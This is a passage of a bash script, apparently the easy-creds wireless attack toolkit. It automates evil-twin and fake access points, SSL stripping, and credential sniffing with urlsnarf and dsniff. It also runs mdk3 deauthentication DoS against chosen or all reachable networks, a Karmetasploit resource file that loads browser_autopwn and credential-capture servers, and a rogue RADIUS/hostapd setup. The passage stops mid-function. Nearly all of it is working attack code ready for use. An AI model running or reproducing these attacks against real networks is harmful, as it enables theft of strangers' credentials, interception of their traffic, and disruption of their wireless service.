  735.         echo "subnet $ATNET netmask $ATSUB {"  >> $DHCPPATH
  736.         echo "  range $ATLSTART $ATLEND;"  >> $DHCPPATH
  737.         echo "  option domain-name-servers $ATDNS;"  >> $DHCPPATH
  738.         echo "  option routers $ATIP;"  >> $DHCPPATH
  739.         echo "  option broadcast-address $ATBROAD;"  >> $DHCPPATH
  740.         echo "  default-lease-time 600;" >> $DHCPPATH
  741.         echo "  max-lease-time 7200;"  >> $DHCPPATH
  742.         echo "}" >> $DHCPPATH
  743. }
  744.  
  745.  
  746. ##################################################
  747. f_dhcpmanual(){
  748.         ATCIDR=
  749.         while [ -z "$ATCIDR" ]; do
  750.           read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR
  751.           if [[ ! $ATCIDR =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}$ ]]; then ATCIDR=; fi
  752.         done
  753.  
  754.         ATDNS=
  755.         while [ -z "$ATDNS" ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done
  756.  
  757.         f_ipcalc
  758. }
  759.  
  760.  
  761. ##################################################
  762. f_dhcptunnel(){
  763.         etterlaunch=7
  764.  
  765.         # airbase-ng is going to create our fake AP with the SSID we specified
  766.         echo -e "\n\e[1;33m[*] Launching Airbase with your settings.\e[0m"
  767.  
  768.         if [ "$eviltwin" == "1" ] && [ -z $isxrunning ]; then
  769.           screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e "$ESSID" $MONMODE
  770.         elif [ "$eviltwin" == "1" ] && [ ! -z $isxrunning ]; then
  771.           xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "$ESSID" $MONMODE &
  772.         elif [ -z $isxrunning ]; then
  773.           screen -dmS easy-creds -t Airbasg-NG airbase-ng -e "$ESSID" -c $CHAN $MONMODE
  774.         else
  775.           xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -e "$ESSID" -c $CHAN $MONMODE &
  776.         fi
  777.         sleep 7
  778.  
  779.         echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m"
  780.         ifconfig "$TUNIFACE" up
  781.         ifconfig "$TUNIFACE" "$ATIP" netmask "$ATSUB"
  782.         ifconfig "$TUNIFACE" mtu 1500
  783.         route add -net "$ATNET" netmask "$ATSUB" gw "$ATIP" dev "$TUNIFACE"
  784.         sleep 2
  785.  
  786.         echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m"
  787.         iptables --flush
  788.         iptables --table nat --flush
  789.         iptables --delete-chain
  790.         iptables --table nat --delete-chain
  791.         iptables -P FORWARD ACCEPT
  792.         iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
  793.         iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  794.         sleep 2
  795.  
  796.         echo -e "\n\e[1;33m[*] Launching Tail.\e[0m"
  797.         if [ -z $isxrunning ]; then
  798.          screen -S easy-creds -t DMESG -X tail -f /var/log/messages
  799.         else
  800.          y=$(($y+$yoffset))
  801.          xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages &
  802.         fi
  803.         echo $! > /tmp/ec/tail.pid
  804.         sleep 3
  805.  
  806.         echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n"
  807.         if [ -e /etc/dhcp/dhcpd.conf ]; then
  808.                 dhcpd -q -cf $DHCPPATH -pf /var/run/isc-dhcp-server/dhcpd.pid $TUNIFACE &
  809.         elif [ -e /etc/sysconfig/dhcpd ]; then
  810.                 systemctl start dhcpd.service
  811.         else
  812.                 service dhcpd start
  813.         fi
  814.        
  815.         sleep 3
  816.         f_finalstage
  817.         f_mainmenu
  818. }
  819.  
  820.  
  821. ##################################################
  822. f_finalstage(){
  823.  
  824.         if [ -z $wireless ]; then
  825.            read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK
  826.            SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')"
  827.         fi
  828.  
  829.         if [ "$etterlaunch" -lt "8" ];then
  830.                 if [ ! -z $isxrunning ]; then
  831.                   echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n"
  832.                   if [ "$offset" == "1" ]; then
  833.                     y=$(($y+$yoffset))
  834.                   fi
  835.                   sslstripfilename=sslstrip$(date +%F-%H%M).log
  836.                   xterm -geometry "$width"x$height-$x+$y -bg blue -fg white -T "SSLStrip" -e sslstrip -pfk -w $logfldr/$sslstripfilename &
  837.                 else
  838.                   echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n"
  839.                   sslstripfilename=sslstrip$(date +%F-%H%M).log
  840.                   screen -dmS easy-creds -t sslstrip -pfk -w $logfldr/$sslstripfilename
  841.                 fi
  842.         fi
  843.         echo $! > /tmp/ec/sslstrip.pid
  844.         sleep 2
  845.        
  846.         if [ -z "$ettercapversion" ]; then
  847.                 f_ecap
  848.         else
  849.                 f_ecap_assimilation
  850.         fi
  851.        
  852.         sleep 3
  853.  
  854.         echo -e "\n\e[1;33m[*] Configuring IP forwarding...\e[0m\n"
  855.         echo "1" > /proc/sys/net/ipv4/ip_forward
  856.         sleep 3
  857.  
  858.         echo -e "\n\e[1;33m[*] Launching URLSnarf...\e[0m\n"
  859.         if [ "$wireless" == "1" ]; then
  860.                 y=$(($y+$yoffset))
  861.                 xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf  -i $TUNIFACE &
  862.                 sleep 3
  863.         elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then
  864.                 screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $TUNIFACE
  865.         elif [ -z $wireless ] && [ -z $isxrunning ]; then
  866.                 screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $IFACE
  867.                 screen -S easy-creds -X select 2
  868.                 screen -S easy-creds -X logfile $logfldr/urlsnarf-$(date +%F-%H%M).txt
  869.                 screen -S easy-creds -X log
  870.         else
  871.                 y=$(($y+$yoffset))
  872.                 xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf  -i $IFACE &
  873.                 sleep 3
  874.         fi
  875.  
  876.         echo -e "\n\e[1;33m[*] Launching Dsniff...\e[0m\n"
  877.         if [ "$wireless" == "1" ]; then
  878.                 y=$(($y+$yoffset))
  879.                 xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log &
  880.                 sleep 3
  881.         elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then
  882.                 screen -S easy-creds -t dsniff -X screen dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log
  883.         elif [ -z $wireless ] && [ -z $isxrunning ]; then
  884.                 screen -S easy-creds -t dsniff -X screen dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log
  885.         else
  886.                 y=$(($y+$yoffset))
  887.                 xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log &
  888.                 sleep 3
  889.         fi
  890.  
  891.         if [ "$SIDEJACK" == "y" ]; then
  892.                 f_sidejack
  893.         fi
  894.  
  895.         echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m"
  896.         sleep 5
  897. }
  898.  
  899.  
  900. ##################################################
  901. f_fakeapeviltwin(){
  902.         eviltwin=1
  903.         ESSID=default
  904.         f_fakeapAttack
  905. }
  906.  
  907.  
  908. ##################################################
  909. f_mdk3aps(){
  910.         clear
  911.         f_Banner
  912.         dosattack=1
  913.  
  914.         # grep the MACs to a temp white list
  915.         ifconfig -a| grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst
  916.         echo
  917.  
  918.         read -p "Do you have the BSSID address of the AP you'd like to attack? [y/N]: " havemac
  919.         havemac="$(echo ${havemac} | tr 'A-Z' 'a-z')"
  920.         echo
  921.  
  922.         if [ "$havemac" == "y" ]; then
  923.          dosmac=
  924.          while [ -z "$dosmac" ]; do read -p "Please enter the BSSID address of the AP you wish to DoS: " dosmac; done
  925.  
  926.          echo "$dosmac" > /tmp/ec/ec-dosap
  927.          airmon-ng | egrep 'wlan|ath' | sed '$a\\n'
  928.          doswlan=
  929.          while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done
  930.  
  931.          phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
  932.  
  933.          echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
  934.          airmon-ng start $doswlan &
  935.          sleep 3
  936.  
  937.          dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
  938.  
  939.          echo -e "\nUsing $dosmon for the attack.\n\n"
  940.  
  941.          echo -e "\n\e[1;33m[*] Please stand by while we DoS the AP with BSSID Address $dosmac...\e[0m"
  942.          sleep 3
  943.  
  944.         if [ -z $isxrunning ]; then
  945.                 screen -S easy-creds -t MDK3-DoS -X screen mdk3 $dosmon d -b /tmp/ec/ec-dosap
  946.         else
  947.                 xterm -geometry "$width"x$height+$x-$y -T "MDK3 AP DoS" -e mdk3 $dosmon d -b /tmp/ec/ec-dosap &
  948.         fi
  949.  
  950.          echo $! > /tmp/dosap-pid
  951.          sleep 5m && kill $(cat /tmp/ec/dosap-pid) &
  952.          echo $! > /tmp/ec/sleep.pid
  953.          echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m"
  954.         else
  955.          f_getbssids
  956.         fi
  957. }
  958.  
  959.  
  960. ##################################################
  961. f_lastman(){
  962.         clear
  963.         f_Banner
  964.         dosattack=1
  965.  
  966.         echo -e "\n\e[1;33m[*] This attack will DoS every AP BSSID & Client MAC it can reach.\e[0m\n\e[1;31mUse with extreme caution\e[0m\n\n"
  967.  
  968.         # grep the MACs to a temp white list
  969.         ifconfig | grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst
  970.  
  971.         airmon-ng | egrep '(wlan|mon)' | sed '$a\\n'
  972.         doswlan=
  973.         while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done
  974.  
  975.         phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
  976.  
  977.         echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
  978.         airmon-ng start $doswlan &
  979.         sleep 3
  980.  
  981.         dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
  982.  
  983.         echo -e "\nUsing $dosmon for attack."
  984.  
  985.         if [ -z $isxrunning ]; then
  986.                 screen -S easy-creds -t Last-Man-Standing -X screen mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null)
  987.         else
  988.                 xterm -geometry 70x10+0-0 -T "Last Man Standing" -e mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null) &
  989.         fi
  990.         echo $! > /tmp/ec/dosap-pid
  991.         sleep 5m && kill $(cat /tmp/ec/dosap-pid) &
  992.         echo $! > /tmp/ec/sleep.pid
  993.  
  994.         airmon-ng stop $dosmon >/dev/null
  995.  
  996.         echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m"
  997.         sleep 7
  998. }
  999.  
  1000.  
  1001. ##################################################
  1002. f_getbssids(){
  1003.         clear
  1004.         f_Banner
  1005.  
  1006.         echo -e "\n\e[1;33m[*] This will launch airodump-ng and allow you to specify the AP to DoS\e[0m\n"
  1007.  
  1008.         airmon-ng | grep wlan | sed '$a\\n'
  1009.         airowlan=
  1010.         while [ -z $airowlan ];do read -p "Please enter the wireless device to use for DoS attack: " airowlan; done
  1011.  
  1012.         phyint=$(airmon-ng | grep $airowlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
  1013.  
  1014.         echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
  1015.         airmon-ng start $airowlan > /dev/null &
  1016.         sleep 3
  1017.  
  1018.         airomon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
  1019.  
  1020.         echo -e "\n\e[1;33m[*] Starting airodump-ng with $airomon, [ctrl+c] in the window when you see the ESSID(s) you want to attack.\e[0m\n"
  1021.  
  1022.         if [ -z $isxrunning ]; then
  1023.                 screen -S easy-creds -t Airodump -X screen $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv
  1024.         else
  1025.                 xterm -geometry 90x25+0+0 -T "Airodump" -e $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv &
  1026.         fi
  1027.         echo $! > /tmp/ec/airodump-pid
  1028.         #wait for the process to die
  1029.         while [ ! -z $(ps -p "$(cat /tmp/ec/airodump-pid)" | grep "$(cat /tmp/ec/airodump-pid)" | sed 's/ //g') ]; do sleep 3; done
  1030.         sleep 3
  1031.  
  1032.         #sometimes the mon interface doesn't transition properly after airodump, decided to stop the interface and restart it clean
  1033.         airmon-ng stop $airomon &> /dev/null
  1034.  
  1035.         echo -e "\n\e[1;33m[*] The following APs were identified:\e[0m\n"
  1036.  
  1037.         #IFS variable allows for spaces in the name of the ESSIDs and will still display it on one line
  1038.         SAVEIFS=$IFS
  1039.         IFS=$(echo -en "\n\b")
  1040.         for apname in $(cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| cut -d "," -f14| sort -u);do
  1041.                 echo [*] "$apname"
  1042.         done
  1043.         echo
  1044.  
  1045.         IFS=$SAVEIFS
  1046.         dosapname=
  1047.         while [ -z $dosapname ]; do
  1048.          read -p "Please enter the ESSID you'd like to attack: " dosapname
  1049.         done
  1050.  
  1051.         cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| grep -a -i "$dosapname" |cut -d "," -f1 > /tmp/ec/ec-macs
  1052.         rm /tmp/ec/airodump-ec*
  1053.  
  1054.         #Make sure none of your MACs end up in the blacklist
  1055.         diff -i /tmp/ec/ec-macs /tmp/ec/ec-white.lst | grep -v ">"|grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-dosap
  1056.  
  1057.         echo -e "\nNow Deauthing clients from $dosapname.\n\nIf there is more than one BSSID, all will be attacked...\n"
  1058.         airmon-ng start $airowlan &> /dev/null
  1059.         sleep 3
  1060.  
  1061.         if [ -z $isxrunning ]; then
  1062.                 screen -S easy-creds -t MDK3-AP-DoS -X screen mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null)
  1063.                 echo -e "\n Exit the MDK3-AP-DoS in the easy-creds session to stop the attack"
  1064.                 sleep 5
  1065.         else
  1066.                 xterm -geometry 70x10+0-0 -T "MDK3 AP DoS" -e mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null) &
  1067.                 echo -e "\nPlease close the xterm window to stop the attack..."
  1068.                 sleep 5
  1069.         fi
  1070. }
  1071.  
  1072.  
  1073. ##################################################
  1074. f_KarmaAttack(){
  1075.         wireless=1
  1076.         karmasploit=1
  1077.  
  1078.         # Credit to Metasploit Unleashed, used as a base
  1079.         clear
  1080.         f_Banner
  1081.         f_xtermwindows
  1082.  
  1083.         echo -e "Network Interfaces:\n"
  1084.         ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
  1085.  
  1086.         while [ -z $IFACE ]; do read -p "Interface connected to the internet, example eth0: " IFACE; done
  1087.  
  1088.         airmon-ng
  1089.  
  1090.         while [ -z $WIFACE ]; do read -p "Wireless interface name, example wlan0: " WIFACE; done
  1091.  
  1092.         airmon-ng start $WIFACE &> /dev/null
  1093.  
  1094.         modprobe tun
  1095.  
  1096.         echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n"
  1097.         airmon-ng | grep mon | sed '$a\\n'
  1098.         MONMODE=
  1099.         while [ -z $MONMODE ]; do read -p "Enter your monitor enabled interface name (ex. mon0): " MONMODE; done
  1100.         TUNIFACE=
  1101.         while [ -z $TUNIFACE ]; do read -p "Enter your tunnel interface (ex. at0): " TUNIFACE; done
  1102.  
  1103.         f_karmadhcp
  1104.         f_karmasetup
  1105.         f_karmafinal
  1106.         f_mainmenu
  1107. }
  1108.  
  1109.  
  1110. ##################################################
  1111. f_karmadhcp(){
  1112.         ATCIDR=
  1113.         while [ -z $ATCIDR ]; do read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR; done
  1114.         ATDNS=
  1115.         while [ -z $ATDNS ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done
  1116.  
  1117.         f_ipcalc
  1118. }
  1119.  
  1120.  
  1121. ##################################################
  1122. f_karmasetup(){
  1123.         echo "use auxiliary/server/browser_autopwn" >> /tmp/ec/karma.rc
  1124.         echo "setg AUTOPWN_HOST $ATIP" >> /tmp/ec/karma.rc
  1125.         echo "setg AUTOPWN_PORT 55550" >> /tmp/ec/karma.rc
  1126.         echo "setg AUTOPWN_URI /ads" >> /tmp/ec/karma.rc
  1127.         echo "set LHOST $ATIP" >> /tmp/ec/karma.rc
  1128.         echo "set LPORT 45000" >> /tmp/ec/karma.rc
  1129.         echo "set SRVPORT 55550" >> /tmp/ec/karma.rc
  1130.         echo "set URIPATH /ads" >> /tmp/ec/karma.rc
  1131.         echo "run" >> /tmp/ec/karma.rc
  1132.         echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc
  1133.         echo "set SRVPORT 110" >> /tmp/ec/karma.rc
  1134.         echo "set SSL false" >> /tmp/ec/karma.rc
  1135.         echo "run" >> /tmp/ec/karma.rc
  1136.         echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc
  1137.         echo "set SRVPORT 995" >> /tmp/ec/karma.rc
  1138.         echo "set SSL true" >> /tmp/ec/karma.rc
  1139.         echo "run" >> /tmp/ec/karma.rc
  1140.         echo "use auxiliary/server/capture/ftp" >> /tmp/ec/karma.rc
  1141.         echo "run" >> /tmp/ec/karma.rc
  1142.         echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc
  1143.         echo "set SSL false" >> /tmp/ec/karma.rc
  1144.         echo "set SRVPORT 143" >> /tmp/ec/karma.rc
  1145.         echo "run" >> /tmp/ec/karma.rc
  1146.         echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc
  1147.         echo "set SSL true" >> /tmp/ec/karma.rc
  1148.         echo "set SRVPORT 993" >> /tmp/ec/karma.rc
  1149.         echo "run" >> /tmp/ec/karma.rc
  1150.         echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc
  1151.         echo "set SSL false" >> /tmp/ec/karma.rc
  1152.         echo "set SRVPORT 25" >> /tmp/ec/karma.rc
  1153.         echo "run" >> /tmp/ec/karma.rc
  1154.         echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc
  1155.         echo "set SSL true" >> /tmp/ec/karma.rc
  1156.         echo "set SRVPORT 465" >> /tmp/ec/karma.rc
  1157.         echo "run" >> /tmp/ec/karma.rc
  1158.         echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc
  1159.         echo "unset TARGETHOST" >> /tmp/ec/karma.rc
  1160.         echo "set SRVPORT 5353" >> /tmp/ec/karma.rc
  1161.         echo "run" >> /tmp/ec/karma.rc
  1162.         echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc
  1163.         echo "unset TARGETHOST" >> /tmp/ec/karma.rc
  1164.         echo "set SRVPORT 53" >> /tmp/ec/karma.rc
  1165.         echo "run" >> /tmp/ec/karma.rc
  1166.         echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
  1167.         echo "set SRVPORT 80" >> /tmp/ec/karma.rc
  1168.         echo "set SSL false" >> /tmp/ec/karma.rc
  1169.         echo "run" >> /tmp/ec/karma.rc
  1170.         echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
  1171.         echo "set SRVPORT 8080" >> /tmp/ec/karma.rc
  1172.         echo "set SSL false" >> /tmp/ec/karma.rc
  1173.         echo "run" >> /tmp/ec/karma.rc
  1174.         echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
  1175.         echo "set SRVPORT 443" >> /tmp/ec/karma.rc
  1176.         echo "set SSL true" >> /tmp/ec/karma.rc
  1177.         echo "run" >> /tmp/ec/karma.rc
  1178.         echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
  1179.         echo "set SRVPORT 8443" >> /tmp/ec/karma.rc
  1180.         echo "set SSL true" >> /tmp/ec/karma.rc
  1181.         echo "run" >> /tmp/ec/karma.rc
  1182. }
  1183.  
  1184.  
  1185. ##################################################
  1186. f_karmafinal(){
  1187.  
  1188.         echo -e "\n\e[1;33m[*] Launching Airbase...\e[0m"
  1189.         # airbase-ng is going to create our fake AP with the SSID default
  1190.         if [ -z $isxrunning ]; then
  1191.          screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e default $MONMODE
  1192.         else
  1193.          xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "default" $MONMODE &
  1194.         fi
  1195.         echo $! > /tmp/ec/ec-karma-pid
  1196.         sleep 7
  1197.  
  1198.         echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m"
  1199.         ifconfig $TUNIFACE up
  1200.         ifconfig $TUNIFACE $ATIP netmask $ATSUB
  1201.         ifconfig $TUNIFACE mtu 1400
  1202.         route add -net $ATNET netmask $ATSUB gw $ATIP dev $TUNIFACE
  1203.         sleep 3
  1204.  
  1205.         echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m"
  1206.         iptables --flush
  1207.         iptables --table nat --flush
  1208.         iptables --delete-chain
  1209.         iptables --table nat --delete-chain
  1210.         iptables -P FORWARD ACCEPT
  1211.         iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
  1212.         sleep 3
  1213.  
  1214.         #Blackhole Routing - Forces clients to go through attacker even if they have cached DNS entries
  1215.         iptables -t nat -A PREROUTING -i $TUNIFACE -j REDIRECT
  1216.  
  1217.         echo -e "\n\e[1;33m[*] Launching Tail...\e[0m"
  1218.         if [ -z $isxrunning ]; then
  1219.          screen -S easy-creds -t DMESG -X screen tail -f /var/log/messages
  1220.         else
  1221.          y=$(($y+$yoffset))
  1222.          xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages &
  1223.         fi
  1224.         echo $! > /tmp/ec/tail.pid
  1225.         sleep 3
  1226.  
  1227.         echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n"
  1228.         if [ -e /etc/dhcp3/dhcpd.conf ]; then
  1229.                 dhcpd3 -q -cf $DHCPPATH -pf /var/run/dhcp3-server/dhcpd.pid $TUNIFACE &
  1230.         elif [ -e /etc/sysconfig/dhcpd ]; then
  1231.                 systemctl start dhcpd.service
  1232.         else
  1233.                 service dhcpd start
  1234.         fi
  1235.         sleep 3
  1236.  
  1237.         if [ -z $isxrunning ]; then
  1238.          echo -e "\n\e[1;33m[*] Launching Karmetasploit in screen. Once it loads press ctrl-a then d return to this window.\e[0m\n"
  1239.          sleep 5
  1240.          screen -S Karmetasploit -t msfconsole msfconsole -r /tmp/ec/karma.rc
  1241.         else
  1242.          echo -e "\n\e[1;33m[*] Launching Karmetasploit, this may take a little bit...\e[0m\n"
  1243.          y=$(($y+$yoffset))
  1244.          xterm -geometry "$width"x$height-$x+$y -bg black -fg white -T "Karmetasploit" -e msfconsole -r /tmp/ec/karma.rc &
  1245.          echo $! > /tmp/ec/ec-metasploit-pid
  1246.         fi
  1247.  
  1248.         #Enable IP forwarding
  1249.         echo "1" > /proc/sys/net/ipv4/ip_forward
  1250.  
  1251.         echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m"
  1252.         sleep 5
  1253. }
  1254.  
  1255.  
  1256. ##################################################
  1257. f_freeradiusattack(){
  1258.         clear
  1259.         f_Banner
  1260.         fra=1
  1261.  
  1262.         atheroscard=$(lsmod | grep -c 'ath')
  1263.  
  1264.         if [ -z $atheroscard ]; then
  1265.          echo -e "\n\e[1;31m[-] I could not find and Atheros wireless card.\nAttack only works with an atheros chipset...\e[0m\n"
  1266.          sleep 5
  1267.         fi
  1268.  
  1269.  
  1270.         mv $pathtoradiusconf/radiusd.conf $pathtoradiusconf/radiusd.conf.back
  1271.         mv $pathtoradiusconf/clients.conf $pathtoradiusconf/clients.conf.back
  1272.  
  1273.         if [ -e $pathtoradiusconf ]; then
  1274.          cat $pathtoradiusconf/radiusd.conf.back | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf
  1275.         else
  1276.          while [! -e $pathtoradiusconf ] && [ -z $pathtoradiusconf ]; do
  1277.           echo -e "\n\e[1;31m[-] I cannot find your radius.conf file, please provide the path\e[0m"
  1278.           read -e -p ": " pathtoradiusconf
  1279.          done
  1280.          cat "$pathtoradiusconf" | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf
  1281.         fi
  1282.  
  1283.         radiussecret=
  1284.         while [ -z $radiussecret ]; do
  1285.          read -p "Please enter the shared secret you'd like to use for the radius connection: " radiussecret
  1286.         done
  1287.  
  1288.         echo
  1289.  
  1290.         f_buildclientsconf
  1291.         f_hostapd
  1292.         f_freeradiusfinal
  1293.         f_mainmenu
  1294. }
  1295.  
  1296.  
  1297. ##################################################
  1298. f_buildclientsconf(){
  1299.  
  1300.         echo "client localhost {" > $pathtoradiusconf/clients.conf
  1301.         echo "  ipaddr = 127.0.0.1" >> $pathtoradiusconf/clients.conf
  1302.         echo "        secret = $radiussecret" >> $pathtoradiusconf/clients.conf
  1303.         echo "        require_message_authenticator = no" >> $pathtoradiusconf/clients.conf
  1304.         echo "        nastype = other" >> $pathtoradiusconf/clients.conf
  1305.         echo "}"  >> $pathtoradiusconf/clients.conf
  1306.         echo "client 192.168.0.0/16 {"  >> $pathtoradiusconf/clients.conf
  1307.         echo "       secret = $radiussecret" >> $pathtoradiusconf/clients.conf
  1308.         echo "       shortname = testAP" >> $pathtoradiusconf/clients.conf
  1309.         echo "}"  >> $pathtoradiusconf/clients.conf
  1310.         echo "client 172.16.0.0/12 {"  >> $pathtoradiusconf/clients.conf
  1311.         echo "       secret = $radiussecret" >> $pathtoradiusconf/clients.conf
  1312.         echo "       shortname = testAP" >> $pathtoradiusconf/clients.conf
  1313.         echo "}"  >> $pathtoradiusconf/clients.conf
  1314.         echo "client 10.0.0.0/8 {"  >> $pathtoradiusconf/clients.conf
  1315.         echo "       secret = $radiussecret" >> $pathtoradiusconf/clients.conf
  1316.         echo "       shortname = testAP" >> $pathtoradiusconf/clients.conf
  1317.         echo "}" >> $pathtoradiusconf/clients.conf
  1318.         # echo "client $ATCIDR {"  >> $pathtoradiusconf/clients.conf
  1319.         # echo "       secret = $radiussecret" >> $pathtoradiusconf/clients.conf
  1320.         # echo "       shortname = testAP" >> $pathtoradiusconf/clients.conf
  1321.         # echo "}" >> $pathtoradiusconf/clients.conf
  1322.  
  1323. }
  1324.  
  1325.  
  1326. ##################################################
  1327. f_hostapd(){
  1328.  
  1329.         airmon-ng | grep 'wlan'
  1330.         radwiface=
  1331.         while [ -z $radwiface ]; do
  1332.          echo -en "\nPlease enter your wirless interface for the attack (ex: wlan0)"
  1333.          read -p " : " radwiface
  1334.         done
  1335.         radssid=
  1336.         while [ -z $radssid ]; do
  1337.          echo -en "\nPlease enter SSID you'd like to use for the attack (ex: FreeWifi)"
  1338.          read -p " : " radssid
  1339.         done
  1340.         radchannel=
  1341.         while [ -z $radchannel ]; do
  1342.          echo -en "\nPlease enter the channel you'd like to use for the attack"
  1343.          read -p " : " radchannel
  1344.         done
  1345.  
  1346.         echo "interface=$radwiface" > /tmp/ec/ec-hostapd.conf
  1347.         echo "driver=nl80211" >> /tmp/ec/ec-hostapd.conf
  1348.         echo "ssid=$radssid" >> /tmp/ec/ec-hostapd.conf
  1349.         echo "logger_stdout=-1" >> /tmp/ec/ec-hostapd.conf
  1350.         echo "logger_stdout_level=0" >> /tmp/ec/ec-hostapd.conf
  1351.         echo "dump_file=/tmp/hostapd.dump" >> /tmp/ec/ec-hostapd.conf
  1352.         echo "ieee8021x=1" >> /tmp/ec/ec-hostapd.conf
  1353.         echo "eapol_key_index_workaround=0" >> /tmp/ec/ec-hostapd.conf
  1354.         echo "own_ip_addr=127.0.0.1" >> /tmp/ec/ec-hostapd.conf
  1355.         echo "auth_server_addr=127.0.0.1" >> /tmp/ec/ec-hostapd.conf
  1356.         echo "auth_server_port=1812" >> /tmp/ec/ec-hostapd.conf
